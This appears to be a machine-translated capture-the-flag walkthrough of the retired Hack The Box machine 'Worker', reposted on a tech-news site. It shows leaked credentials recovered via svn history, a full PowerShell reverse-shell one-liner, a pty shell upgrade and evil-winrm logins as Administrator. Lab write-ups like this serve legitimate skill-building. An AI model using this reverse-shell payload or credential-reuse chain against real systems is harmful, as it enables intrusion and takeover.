Shulou(Shulou.com)05/31 Report--

How to use HTB for Worker penetration testing, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

Basic information

Introduction: Hack The Box is an online penetration testing platform. It can help you improve your penetration testing skills and black box testing skills. The platform environment is a simulated real environment, which helps you better adapt to the penetration in the real environment.

Description:

Note: because it is a retired target aircraft, the current ip address is not the same as that in the information card.

Preface

This walkthrough uses the kali system to operate in accordance with the penetration testing process, obtains the version information of the website and users through svn, uploads Trojan files or goes to shell through the management interface, and finally obtains root permissions by creating pipes to modify administrator passwords.

1. Information collection 1. Target ip

The ip address is 10.129.2.29

2. Target machine port and service nmap-sV-A-O 10.129.2.29

PORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.03690/tcp open svnserve Subversion3, website information collection

Enter port 80 and no useful information is obtained.

Use diesearch to scan the directory and get some information that you don't need at present.

Use svn to view earlier versions of deployed websites

Svn checkout svn://10.129.2.29svn diff-r 2

Got a user and the latest website name

User: nathen

Password: wendel98

Website: http://devops.worker.htb

Write the address to the hosts file for re-access

Write the obtained account number and password to the page

II. Loophole detection and utilization

After research, we can use the authority of this account to publish some information, and this information can be used by other users. We can use this permission to upload a Trojan file and get shell.

Do the following:

Establish a new branch

Enter the newly created branch

Upload Trojan files

After that, it's the same as my operation.

After the operation is completed, enter the link to bounce shell. This process should be faster. If the operation is too slow, the link will fail.

The link to bounce shell is as follows

Powershell-nop-c "$client = New-Object System.Net.Sockets.TCPClient; $stream = $client.GetStream (); [byte []] $bytes = 0.. 65535 |% {0}; while (($I = $stream.Read ($bytes,0, $bytes.Length)-ne 0) {; $data = (New-Object-TypeName System.Text.ASCIIEncoding). GetString ($bytes,0, $I); $sendback = (iex $data 2 > & 1 | Out-String) $sendback2 = $sendback +'PS'+ (pwd). Path +'>'; $sendbyte = ([text.encoding]:: ASCII). GetBytes ($sendback2); $stream.Write ($sendbyte,0,$sendbyte.Length); $stream.Flush ()}; $client.Close () "

Third, raise the right 1. Obtain user.txt

Get interactive shell

Python-c 'import pty;pty.spawn ("/ bin/bash")'

Find the password file in the\ svnrepos\ www\ conf directory

After enumerating, we get the available account number and password.

User: robisl

Password: wolves11

Use evil-winrm for forced login

Link: https://github.com/Hackplayers/evil-winrm

Log in to get the user.txt successfully

2. Raise the right to obtain root.txt

Next, let's use the robisl login administration interface to update the administrator password by creating a new pipe.

Only part of it is retained.

Run after setting up

Use evil-winrm to force login to get root permission

Ruby evil-winrm.rb-I 10.129.2.29-u Administrator-p HTBworkerDone!

Access to the website version information and users after entering the management interface, in the management interface for a long time, because do not know to give the page and the role of delay for a long time, the middle of the rebound shell must try to operate smoothly and quickly, otherwise the rebound will fail, in the face of unfamiliar systems can not be well understood and use needs to be improved.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.